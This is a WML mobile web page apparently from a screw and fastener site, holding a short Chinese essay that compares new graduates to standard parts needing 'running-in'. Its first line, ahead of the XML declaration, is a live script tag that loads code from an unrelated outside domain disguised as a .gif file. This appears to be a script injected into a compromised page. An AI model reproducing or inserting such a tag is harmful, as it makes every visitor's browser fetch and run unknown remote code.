<script src=http://tw.lovechina.tw.cn/count/js/gif.gif></script>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
<head><meta forua="true" http-equiv="Cache-Control" content="max-age=0" /></head>
<card title="“标准件”也需要“磨合" id="card1">
<p> 游客</p><p>
标题:“标准件”也需要“磨合<br/>
正文:<br/>
在工厂混了30来年，对于机械加工接触一点。机械零件的制造是根据设计标准.选材.加工工艺等方面设定要求制作的。能用于通用设备上的零件，我们叫标准件。&amp;ldquo;标准件&amp;rdquo;就标准吗？其实不然。我在实验室工作时，给我分配来了一个大学毕业生，我对他说，你是高等学院里培养出来的&amp;ldquo;材质好的标准件&amp;rdquo;，来到这里首先是需要&amp;ldquo;磨合&amp;rdquo;，等到你的棱角磨得差不多时，你就成才了。这不是笑话&amp;mdash;&amp;mdash;心里话，实实在在。     前天在朋友家吃饭，饭前和他弟弟聊天。他弟弟原是一家企业的老板，现在把厂房设备租赁给别人经营，图个清闲。我问他，你的设备在合同上有没有折旧？他说，我的设备都是从德国引进的，越磨合越好用，就像人一样，时间长了就知道彼此的脾气，深点浅点没关系。     本来都是&amp;ldquo;标准件&amp;rdquo;，出厂时材质都差不多，怎么长时间没磨合就不协调了呢？是因为有的零件经过淬火热处理增加了刚度硬度，还是因为有的零件被腐蚀生锈了呢？     要想&amp;ldquo;心有灵犀一点通&amp;rdquo;，难啊。 <br/><a href="http://www.51ding.cn/screw/wap.asp?mode=WAP&amp;act=View&amp;id=793&amp;Page=1">[&lt;&lt;]</a><a href="http://www.51ding.cn/screw/wap.asp?mode=WAP&amp;act=View&amp;id=793&amp;Page=1">[[1]]</a><a href="http://www.51ding.cn/screw/wap.asp?mode=WAP&amp;act=View&amp;id=793&amp;Page=1">[&gt;&gt;]</a><br/>
<br/>
<a href="wap.asp?act=Com&amp;id=793">查看评论(0)</a><br/>
<a href="wap.asp?act=AddCom&amp;inpId=793">发表评论</a><br/><br/>

<br/>

<br/>
<a href="http://www.51ding.cn/screw/wap.asp">首页</a>
</p>
</card>
</wml>